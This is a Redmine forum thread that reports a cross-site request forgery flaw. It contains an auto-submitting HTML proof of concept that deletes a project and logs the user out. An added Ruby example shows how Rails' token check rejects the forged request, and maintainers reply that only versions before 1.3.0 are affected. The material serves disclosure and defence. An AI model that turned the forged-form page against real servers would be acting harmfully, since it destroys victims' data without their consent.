Redmine is still vulnerable against CSRF

Added by Peter Panther about 7 years ago

It seems that Redmine is still vulnerable against CSRF.

Scenario:
- user is logged in at the redmine server
- user follows a link that executes the following HTML Code
- the project "deleteme" will be deleted automatically and the user will be logged out.

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html>
<head>
<title>CRSF Demonstration</title>
</head>

<body onload="javascript:fireForms()">
<script language="JavaScript">

function fireForms()
{
     document.forms[0].submit();
}

</script>
<H2>CRSF Demonstration</H2>
<form method="POST" name="form0" action="https://<server>/redmine/projects/deleteme">
<input type="hidden" name="_method" value="delete"/>
<input type="hidden" name="confirm" value="1"/>
<input type="hidden" name="commit" value="Delete"/>
</form>
</body>
</html>

I thought that this problem was fixed with rails 2.3.11 and CVE-2011-0447?

I'm using
  • Rails 2.3.11
  • Redmine 1.2.3.stable.8195 (MySQL)

Any ideas?
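For readers wondering what the Rails-side defence against this scenario actually checks, the following is an added example (not Redmine's or Rails' own code) that models protect_from_forgery in miniature: a per-session random token that every state-changing request must echo back, with the _method override resolved before the verb is classified, so the forged POST carrying _method=delete is treated as a DELETE. The class and method names, the session key _csrf_token and the constructed session are this example's assumptions.

```ruby
require 'securerandom'

# Minimal model of Rails' CSRF protection (added example, not Redmine code).
# A session is a Hash the server trusts because the browser sent its cookie;
# params are the submitted form fields. The attacker's page can make the
# victim's browser send the cookie, but cannot read the token out of it.
class CsrfGuard
  SAFE_METHODS = %w[GET HEAD].freeze

  # Ensure the session holds a random per-session token
  # (session key name is this example's own assumption).
  def self.token_for(session)
    session[:_csrf_token] ||= SecureRandom.base64(32)
  end

  # Resolve the effective verb: a POST carrying _method=delete is handled
  # as DELETE, exactly what the demonstration form relies on. The override
  # must be applied BEFORE deciding whether the request changes state.
  def self.effective_method(http_method, params)
    m = http_method.to_s.upcase
    override = params['_method']
    m == 'POST' && override ? override.to_s.upcase : m
  end

  # Constant-time comparison so a wrong token does not leak by timing.
  def self.secure_equal?(a, b)
    return false unless a.bytesize == b.bytesize
    diff = 0
    a.bytes.zip(b.bytes) { |x, y| diff |= x ^ y }
    diff.zero?
  end

  # True when the request may proceed. Safe verbs pass; anything else must
  # present the session's token as the authenticity_token field or the
  # X-CSRF-Token header, and it must match the one stored in the session.
  def self.verified?(http_method:, params:, session:, headers: {})
    return true if SAFE_METHODS.include?(effective_method(http_method, params))
    expected = session[:_csrf_token]
    return false if expected.nil? || expected.empty?
    presented = params['authenticity_token'] || headers['X-CSRF-Token']
    return false if presented.nil?
    secure_equal?(presented.to_s, expected)
  end
end

# Replay the forged form from the post against the guard, using a constructed
# logged-in session (the cookie travels with the cross-site POST automatically).
def forged_request_allowed?
  session = { user_id: 42 }
  CsrfGuard.token_for(session)
  CsrfGuard.verified?(
    http_method: 'POST',
    params: { '_method' => 'delete', 'confirm' => '1', 'commit' => 'Delete' },
    session: session
  )
end

# A genuine delete submitted from the server-rendered confirmation page
# carries the token that the server embedded in that page.
def legitimate_request_allowed?
  session = { user_id: 42 }
  token = CsrfGuard.token_for(session)
  CsrfGuard.verified?(
    http_method: 'POST',
    params: { '_method' => 'delete', 'confirm' => '1', 'authenticity_token' => token },
    session: session
  )
end

# A guessed or stale token must be rejected as well.
def wrong_token_allowed?
  session = { user_id: 42 }
  CsrfGuard.token_for(session)
  CsrfGuard.verified?(
    http_method: 'POST',
    params: { '_method' => 'delete', 'authenticity_token' => 'not-the-real-token' },
    session: session
  )
end

if __FILE__ == $PROGRAM_NAME
  puts "forged request allowed?     #{forged_request_allowed?}"      # false
  puts "legitimate request allowed? #{legitimate_request_allowed?}"  # true
  puts "wrong token allowed?        #{wrong_token_allowed?}"         # false
end
```

The point the thread turns on is the second half of the check: a login cookie alone is not evidence that the user intended the request, so a deleting action must also prove it came from a page the server itself rendered. Whether a given Redmine version wires this check into the project deletion action is exactly what the replies below settle.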

Replies (2)

RE: Redmine is still vulnerable against CSRF - Added by Jan from Planio www.plan.io about 7 years ago

Thanks for reporting this. However, we were unable to reproduce this with:

  • Redmine 1.2.3.stable.8195 (MySQL)
  • both Rails 2.3.11 and Rails 2.3.14

If you believe we missed something, please get in touch via and we'll discuss it off the record until we can determine if it's an actual vulnerability and commit a fix.

Thanks!

RE: Redmine is still vulnerable against CSRF - Added by Jean-Philippe Lang about 7 years ago

This issue affects Redmine < 1.3.0 only.
